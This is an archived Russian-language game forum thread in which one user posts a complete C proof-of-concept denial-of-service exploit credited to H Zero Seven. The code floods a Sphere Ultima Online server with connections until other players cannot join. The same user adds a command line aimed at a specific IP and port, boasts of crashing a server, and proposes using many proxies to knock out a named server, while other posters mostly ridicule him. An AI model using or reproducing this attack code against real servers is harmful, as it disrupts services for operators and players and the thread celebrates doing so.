PDA

Просмотр полной версии : ммм, жесть вообщем...


uorypT ToJICTbIu
28.05.2007, 17:14
/*
*
* www.h07.org
* H Zero Seven
* Unix Security Research Team
*
* Sphere Ultima Online Server - Denial of Service Vulnerability
* poc-exploit...
*
* Simple code to eat all connections from the gameserver, so other
* peoples could not connect to the server.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <time.h>
#include <sys/time.h>

int Connect(int ip, int port)
{
int fd;
struct sockaddr_in tgt;

fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (fd<0) return -1;
memset(&tgt,0,sizeof(struct sockaddr_in));
tgt.sin_port = htons(port);
tgt.sin_family = AF_INET;
tgt.sin_addr.s_addr = ip;
if (connect(fd,(struct sockaddr*)&tgt,sizeof(struct sockaddr))<0) return -1;
return fd;
}

int sprint(int fd, const char *str,...)
{
va_list args;
char buf[4096];
memset(&buf,0,sizeof(buf));
va_start(args,str);
vsnprintf(buf,sizeof(buf),str,args);
return(write(fd,buf,strlen(buf)));
}

int main(int argc, char *argv[])
{
int fd;
struct sockaddr_in box;

fprintf(stderr, "SphereServer DoS Exploit [poc]\n");
fprintf(stderr, "H Zero Seven - Unix Security Research Team - www.h07.org\n\n");
if (argc < 2) {
fprintf(stderr, "usage: %s <sphere ip> [sphere port]\n",argv[0]);
return;
}

fprintf(stderr,"for the full advisory regarding this vulnerability visit www.h07.org ... \n");
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (fd<0) {
perror("socket() ");
return;
}

fprintf(stderr,"Attacking sphere : ");
for (;;) {
int sock;

sock = Connect(inet_addr(argv[1]),(argc>2)?(atoi(argv[2])):3128);
if (sock<0) {
sleep(10);
continue;
}
fprintf(stderr, ".*");
}
}

Нет таймаута на соединение до проверки имени пользователя и ограничения числа коннектов с одного IP.
Бугагагагагага :lol::lol::lol::lol::lol::lol::lol::lol:
кстате все серверы с етим багом мухахахха :lol::lol::lol::lol:
R a m
28.05.2007, 17:15
еще разок по Русски=) не все такие чИторы..
uorypT ToJICTbIu
28.05.2007, 17:16
Я не могу остановиться от смеха :lol::lol::lol::lol::lol::lol::lol:




perl uo.pl $ip 217.16.31.162 $port 2593
enter

И онлаааааааааааайна ппц :-D
:lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol:
R a m
28.05.2007, 17:17
а хде прол онлаин написоно?
BepkuT
28.05.2007, 17:17
Какуюто херню выложил я херею, БАН ему за бред , я нефиха не понял :lol:
uorypT ToJICTbIu
28.05.2007, 17:18
:lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol::lol::lol::lol::lol::lol:
:lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol:
Только что сделал на локальной сфере мах онлайна :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: что она аж бедненькая вылетела :lol::lol::lol::lol::lol::lol::lol:
R a m
28.05.2007, 17:18
Какуюто херню выложил я херею, БАН ему за бред , я нефиха не понял :lol:
во внатуре! бан и точка! ибо нех ..
BepkuT
28.05.2007, 17:19
..

Если ты что-то понимаеш расскажи мне :D
R a m
28.05.2007, 17:20
он сделал на локальнои сфере онлаина больше максимума и она у него вылетела, поетому всем надо ЗОпесать!
white
28.05.2007, 17:21
Ща кто то шарящий в скриптах напишет в топике что автор бред написал. и сразу все вопросы отпадут )
BepkuT
28.05.2007, 17:21
!

А ну тогдаа я запишу такое... Ёгурт ты молодец ...
R a m
28.05.2007, 17:22
Ща кто то шарящий в скриптах напишет в топике что автор бред написал. и сразу все вопросы отпадут )
я не буду етогго писать=))
uorypT ToJICTbIu
28.05.2007, 17:22
Бугагагагаггагаг теперь если я упаду я могу откат сделать на оскоме :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol:
Только мне ет не надо потому что я не играю... а так зашибись :lol::lol::lol::lol::lol::lol::lol::lol::lol::lol: :lol::lol::lol::lol:
C.C.C.P
28.05.2007, 17:23
Бред какой-то, нам зачем это показывать?
Haldir
28.05.2007, 17:26
Дайте малолетке самоутвердиться, показав какой он типа крутой проггер %)
Spitfire
28.05.2007, 17:27
нам зачем это показывать?
Наверное хотел показать какой он умный кулл хацкер :lol: А в этоге своими месагами и кучей смайлов показал свою тупизну =)
uorypT ToJICTbIu
28.05.2007, 17:27
Дайте малолетке самоутвердиться, показав какой он типа крутой проггер %)
Лох? ты не видеш что там написано ? ты не вижеш авторвство ? Если нет ты ЛОХ.




Нада найти много проксей и валить оском :lol::lol::lol::lol:
BepkuT
28.05.2007, 17:27
....

Любой каприз за ваши деньги (с)кто-то там...
И даже откат сделать сможеш :D :D :lol: